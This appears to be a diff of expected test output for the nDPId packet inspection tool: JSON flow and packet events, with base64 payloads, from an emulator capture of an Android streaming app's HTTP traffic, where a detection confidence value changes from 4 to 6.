WC4uT7flRYLhk+35UWC4ZPt+VFguKM+35UWC4Z+n5UALn6flQAZ+n5UAVtWhW50y4gYAiSJlxjrxWNeHPSlHujWlU5KkZdmcx8J72WSwuLGbGYH3KCBkA9RXm5ZUvCVPsevnNJOUKy6o69T9Pyr1E9EeHfUXP0\/Ki4XDP0\/Ki4XDP0\/Ki4XDP0\/Ki4XDP0\/Ki4XDP0\/Ki4XAfh+VAXF\/AUBcPwFAXD8BQFw\/AUBcPwFAXD8BQFw\/AUBcPwFAXD8BQFw\/AUBcD07UBcQHnt+VFwuKenagLiZ+n5UXC4A89vyouFxfyoC4mcelAXGPMiDJKigGzH8ReKtJ0iBpLu6RcD7vVj+FUTzjvCGrLrGmLfou1ZeVDIAQM96Aua4PI6dfSgdx\/4CpHcPwFAXD8BQFzP8R3IttNlkOMbT2FY4iX7oZ4f4nk\/te7NpHLIhDE5XFfKSb7jLBkk0HSQQfMfgYIzWEm+5Ri+KPFcml6Wbt5
cueQoArSg33JlI4mz+MAt70C68z96TtJTgVvyzkY+0Ox8H3V3r9294t0fKZflHpWclLuXF8wx9Lmg1G4+2TF4C2Qx9Kz53Hqanmnxtu49KvLe+tLx1ROCobHWuvD3mtzCruP8ACnxEvrqW1WB5JPNIXBXIFazpytqRTlqdh8OtY1q1+NWmW97bFY7xiI328fdNVg7e2SudB9H6PLINTuVJXqD9wcV9KSbIdsfw\/wDfIoC4ySRicfL\/AN8igCGSWUcqF\/74H+FSy48vUjiunMhBC5Xr8g\/woKlHsTPc4jJZkA91FBBxfjr4maLoKzW8UqXV7FHv+zxKpO3OM+lRKVioxueXL8U9bvrj7Vq2qWumWjriKGBVzuyeST\/s1nds2SsfRUv3\/wAB\/KutHKwoAkHSgAoAKAHDpQAUAFABQA4dKACgAoAUdaAFoAKACgAo"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1625,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385139579,"flow_last_seen":1654385139579,"flow_idle_time":7580000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1654385139579,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"103.29.71.30","src_port":35200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1625,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1654385139579,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":953,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":953,"pkt_l4_len":919,"thread_ts_msec":1654385139579,"pkt":"tKXvZygQnLbQ0+MzCABFAAOrd4dAAEAGTmTAqAJ+Zx1HHomAAFCgxdnYmdL2h4AYAfZ0\/wAAAQEICoGE\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"} 
-01311{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1625,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385139579,"flow_last_seen":1654385139579,"flow_idle_time":7580000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1654385139579,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"103.29.71.30","src_port":35200,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"release.bigdata.1kxun.com","url":"release.bigdata.1kxun.com\/c\/35\/13277?&_in_app=kankan&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&_v=2.8.2.1&_package=com.sceneway.kankan&_model=sdk_gphone_x86&_ov=11&_brand=Google&_android_id=b9e28776354d259e&_gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&t=1654385136&_=1654385137968&_channel=1kxun&_locale=US_en&_carrier=310260&_resolution=1080%2C1794&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01311{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1625,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385139579,"flow_last_seen":1654385139579,"flow_idle_time":7580000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1654385139579,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"103.29.71.30","src_port":35200,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": 
{"hostname":"release.bigdata.1kxun.com","url":"release.bigdata.1kxun.com\/c\/35\/13277?&_in_app=kankan&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&_v=2.8.2.1&_package=com.sceneway.kankan&_model=sdk_gphone_x86&_ov=11&_brand=Google&_android_id=b9e28776354d259e&_gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&t=1654385136&_=1654385137968&_channel=1kxun&_locale=US_en&_carrier=310260&_resolution=1080%2C1794&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1626,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1654385139941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":563,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":563,"pkt_l4_len":529,"thread_ts_msec":1654385139941,"pkt":"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"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1627,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140171,"flow_last_seen":1654385140171,"flow_idle_time":7580000,"flow_min_l4_payload_len":765,"flow_max_l4_payload_len":765,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":765,"midstream":1,"thread_ts_msec":1654385140171,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1627,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1654385140171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":831,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":831,"pkt_l4_len":797,"thread_ts_msec":1654385140171,"pkt":"tKXvZygQnLbQ0+MzCABFAAMxxydAAEAG\/ubAqAJ+oXUNHbFEAFArm5Oyz2Zv74AYAfZ03AAAAQEICrrGE\/SXERVjR0VUIC9kZXRhaWw\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"} -01182{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1627,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140171,"flow_last_seen":1654385140171,"flow_idle_time":7580000,"flow_min_l4_payload_len":765,"flow_max_l4_payload_len":765,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":765,"midstream":1,"thread_ts_msec":1654385140171,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/detail?id=27159&sytjdt&_in_app=kankan&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&_v=2.8.2.1&_package=com.sceneway.kankan&_model=sdk_gphone_x86&_ov=11&_brand=Google&_android_id=b9e28776354d259e&_gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&t=1654385139","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
+01182{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1627,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140171,"flow_last_seen":1654385140171,"flow_idle_time":7580000,"flow_min_l4_payload_len":765,"flow_max_l4_payload_len":765,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":765,"midstream":1,"thread_ts_msec":1654385140171,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/detail?id=27159&sytjdt&_in_app=kankan&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&_v=2.8.2.1&_package=com.sceneway.kankan&_model=sdk_gphone_x86&_ov=11&_brand=Google&_android_id=b9e28776354d259e&_gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&t=1654385139","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
02409{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1628,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1654385140551,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385140551,"pkt":"nLbQ0+MztKXvZygQCABFAAXUeftAADQGVXChdQ0dwKgCfgBQsUTPZm\/vK5uWr4AQAO+9VgAAAQEICpcRFhe6xhP0SFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTo0MCBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sDQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KTGFzdC1Nb2RpZmllZDogVHVlLCAxMCBNYXkgMjAyMiAwNzoxNzo1NyBHTVQNCkVUYWc6IFcvIjYyN2ExMWE1LTFhZmQiDQpDb250ZW50LUVuY29kaW5nOiBnemlwDQoNCjk0NQ0KH4sIAAAAAAAAA+1ZzXPjthW\/+6\/A8hBKYxIk9S3LtGfX3kkz2a\/uutN2NB4NREIyZArgkpBlxfa5nZ46PeTQe0+9Z9Imf85urv0X+gCQEuWP7qbNTJJJPR6TAB8e3jceft5\/dPzy6OT3r56iMzlP0KvfPHn22RGyXM\/7bfPI845PjtHvfnXy\/BkKsI9OMsJzJpngJPG8py+sHYSsMynTPc9bLpd42cQim3onr71LxS1Qy4tXV1bW4ljG1sHOviJSD0riA2C1P6eSgBwydenbBbsIrSPBJeXSPVml1EKRGYWWpJfSU4sHKDojWU5luJATtzdAkiY0PROchlxY3oYpJ3MaWheMLlORSSW3+VmzXLJYnoUxvWARdfXAQYyDriRx84gkNAQDOGhOLtl8Md+aArJbU4ucZpqEjGHhfZJkdEKzjGYVpUTGpoyDWcAQCePn6AyIQsuL8twjaYrheRi0+n7bQhLMUVgBZi2U0SS0crlKaH5GqSwUrzKZ5V6+ZCnNigeeM644fhSv\/UeuC0LlUcZSiUi+4hHKswhk81IyBec18FSIKey+4jGLiAoQHIl58dWDzUmcj1eGCM9y62DfM9wOXFcrXPDWXFUA5BBR6QXOxdlCc4qYXM1ywQ8ZNa6usFAGK9ZXDDMjF8TMWgdoyXgsljhKxAKeSY7CO1PX11cQR5Lxab53dePkksiFersZrFdhcAOLQ6vhN3y\/HfSbrb5V+ZouxgmLRud0FVo+bY07vd44GkfNqN0nzaAx7nf9dp9OYHHUa1Hapj06Dvx2L+4EjV43isbjSTQJSK9NSMMaoNpkwSNlytrSiZ3cSRxWv1oOk9NQ\/bm+Hp4O1AtOF\/lZ7cqeyjkGoTNp73G6RMdE0lodT6k8YXN4c+gFJNKeJpvl9k19cEEyNAljRfI0oXP4mj9ZnZDpC0iVWl4f+qfODD5HGQVWBQXMO3ESJo9COyaSPCMrmtmH9idJaO8me7Y9mGEdHqHMFhQGyp926U+Sso0HMGEqLpTUs\/wQrGrvst04GUxwSjKQ5YWIKWYcEkk+oROR0drMmdQHN\/Wa8aUTi2ihhHZs42XbqYjk2J+ePHfbjfbz1vOmXR+gdbztfDBa1rUBmSAvxX\/7BZQVnWR4Ktl8iiPu6TlPpJSDct7baJQIEtNMhTh
SBnKLiAn8oN3tNpt+MZ3RmGU0kouMhbqAqnhX9iHndE74lOigX9KxlwgoCr9++5oCLYdqUZQ7S9c7C20SaWfnnjQNbe0OW2uydoQq1SYXJZmChVXNy\/WOMNZeSSWoYG+Yb2ep0Sx2o4SBA0IrIi7Evtvq9IJu0Gp3m61mM+j0rGqpKK34PxeMe\/Xc9lROo0VGQSSoOniKYwGJSUHY6BxzKr0tJSt1RClZiQ4TyJZ+WNsbfKQBK7zvMN5m+F9KvJFWFVFU1rS1bzdlbjN1fY2uonm8h4anNwO9av0Nw7wpJ+vSU0dXmgahDVVMJ4zTN4mQNdtrBJ1Otxv0G93AK4N3lEuw9WrUbPuXbX8UBEHXdtBwCGMHtaGuIHuSLFisJjstmGt21OSw2TDfFUHMLtxpKl0S"} 02113{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1629,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":1654385140556,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1267,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1267,"pkt_l4_len":1233,"thread_ts_msec":1654385140556,"pkt":"nLbQ0+MztKXvZygQCABFAATlefxAADQGVl6hdQ0dwKgCfgBQsUTPZnWPK5uWr4AYAO+qDAAAAQEICpcRFhe6xhP0u0Gn2Wk3A7\/T7fd6rm\/XMYnjNyZsaxuxjL9r9brRqipx+QlDnkIovIEin9DX0GNAPtf+E30kkoSkOX06T+XqmF3k91EXTIs8Kimgwir3lOecejeF6qflqjHhnGZ3XLXllrXbPuChwO81Gv7\/PZRAGwvHww+UTBz6qQs6gsoPnkrW2bRJoTJtIINa\/b6Dgk5fZdPahfenU9Dst3o\/X2dtHXa6izQzCLFJTbWBYoJYfnQOJy8KQ2SVFc2CiqYKfUmt6R8VlFA8bn1EqFZpXTf1tDoJFXV4Wi\/6sG3eqiibCjUi8cicl3vowQPTubvaFJeROjZHCfRwCTDK95Dqr24TQ8XZnrqpDiuDdVFS37fbhi1Lqg5xXV9B9827OkRutnZbf1NxX6XVY22ih+nvHjpVyUsTqqT6yZ89Dwn+gSPog8vuO4keWnTnQKoSFlGyToAtx\/2QjvhxTpaqqtXA+eXZ\/0c\/N34urjBHwa2i6BlQykBS5a1LX7oAVdqXTCb04Ltv\/\/7+L1\/ue2a0sw89K1L4AFz6VOsPQyAtJyu3EKLAr3U\/WEVzKqCFuSB4nslPrO6Y7szc0iqsvIj4NIppYxtV2Sl23ynK+04JkGiABas73gy632zlBjiAXw0HbeEyD66AjQRP3QZuYf\/7LEvIFyt1O\/7AGlsLdxerguuoMZStwb+NoSq31C2ZtxgZZTE04NDQ51KkhRQfwfPdN3979\/WfvvvyD++++er9n\/\/4\/h9fvfv6n\/\/69q8xBY\/ElEcrlyQJWGVHx7vp8QvngZnvkBWI28eqYSlfTcZuHp8rF38\/G+jFgPvEIsPjBY8TCjwOg04LOr9ur9v6CHZbNtX8ILrhKm1APoUirjn2ABWrXnm3Ym59\/xcMgCYcnF8uOJ6LsUaBQDlPz4wMwwe5eFUt2uru2W8GD1N7MoKAW9JYJEKca4QDrAmwSmHNDcABebK5nT0qm0UE0BuKHSTLa\/ASn7BzKc4fAwC+gktu\/nI8AxgnlBpNk\/ItYHNSAXTSAHQwgwHUPhNxHg4t1cRZjgVIeHQOTwbRI9lkpV45QHccUBh4j+l4MYWn4OrPZKJfI7UQ
kLhYUZOEEUU5zcQihac5749ARabIYparW24xPnWUEABtPubxsUKdw1K7mnRo\/UoO6elmCsamB4BZsBcHP9ceZxlZ4TQTUqjGGufgfooBE09qJJtqEC53\/Hq9DlgpIHU11Tay0B+w\/Yr6OKF8Ks8GbHe3fkugGoy1kIWlhuy0PlA0pVU24sn6VbkDDRXJiBWmdjjsyO\/bkd+zI93aj8N+mQbYEL3RX1Sh2uxKHV6\/MlptwLoyArDUEaGDiwU97qXskiaehltzlbJalRErxAWY2WwBkoPhh8Y9eoBHi5Dp7UcQUUo5uaHWbtotkV1DJQyV2FAJxZOrsQ5IEZYo6S0Y1zLBbtUHAt+PmTuiQHIf+fCqjg22ax1C3qgDbpfuWp8kbAxvJvLJZqN74eT1foAqD8iDEK9wSB1AKY04KQMoN9Tsox6k+ecnR\/7Lz5uPX79qfxY8\/xQw3TWVSiuDutyU4DAq9QYkCRgp6vX5rs5E\/c+jg51\/A9YbBkX9GgAADQowDQoNCg=="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140779,"flow_last_seen":1654385140779,"flow_idle_time":7580000,"flow_min_l4_payload_len":443,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":443,"flow_avg_l4_payload_len":443,"midstream":1,"thread_ts_msec":1654385140779,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45388,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01063{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1654385140779,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"thread_ts_msec":1654385140779,"pkt":"tKXvZygQnLbQ0+MzCABFAAHvAsFAAEAGxI\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"} 
-00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1635,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140779,"flow_last_seen":1654385140779,"flow_idle_time":7580000,"flow_min_l4_payload_len":443,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":443,"flow_avg_l4_payload_len":443,"midstream":1,"thread_ts_msec":1654385140779,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45388,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/swiper\/swiper.min.css","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1635,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140779,"flow_last_seen":1654385140779,"flow_idle_time":7580000,"flow_min_l4_payload_len":443,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":443,"flow_avg_l4_payload_len":443,"midstream":1,"thread_ts_msec":1654385140779,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45388,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/swiper\/swiper.min.css","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1636,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140794,"flow_last_seen":1654385140794,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":424,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1654385140794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45398,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01038{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1654385140794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":490,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":490,"pkt_l4_len":456,"thread_ts_msec":1654385140794,"pkt":"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"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1636,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140794,"flow_last_seen":1654385140794,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":424,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1654385140794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45398,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/dependency-all.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
+00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1636,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140794,"flow_last_seen":1654385140794,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":424,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1654385140794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45398,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/dependency-all.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1637,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140824,"flow_last_seen":1654385140824,"flow_idle_time":7580000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":416,"flow_avg_l4_payload_len":416,"midstream":1,"thread_ts_msec":1654385140824,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01026{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1654385140824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":482,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":482,"pkt_l4_len":448,"thread_ts_msec":1654385140824,"pkt":"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"} 
-00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1637,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140824,"flow_last_seen":1654385140824,"flow_idle_time":7580000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":416,"flow_avg_l4_payload_len":416,"midstream":1,"thread_ts_msec":1654385140824,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/fb-sdk.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1637,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140824,"flow_last_seen":1654385140824,"flow_idle_time":7580000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":416,"flow_avg_l4_payload_len":416,"midstream":1,"thread_ts_msec":1654385140824,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/fb-sdk.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1638,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140835,"flow_last_seen":1654385140835,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":434,"flow_tot_l4_payload_len":434,"flow_avg_l4_payload_len":434,"midstream":1,"thread_ts_msec":1654385140835,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01050{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1638,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1654385140835,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":500,"pkt_l4_len":466,"thread_ts_msec":1654385140835,"pkt":"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"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1638,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140835,"flow_last_seen":1654385140835,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":434,"flow_tot_l4_payload_len":434,"flow_avg_l4_payload_len":434,"midstream":1,"thread_ts_msec":1654385140835,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": 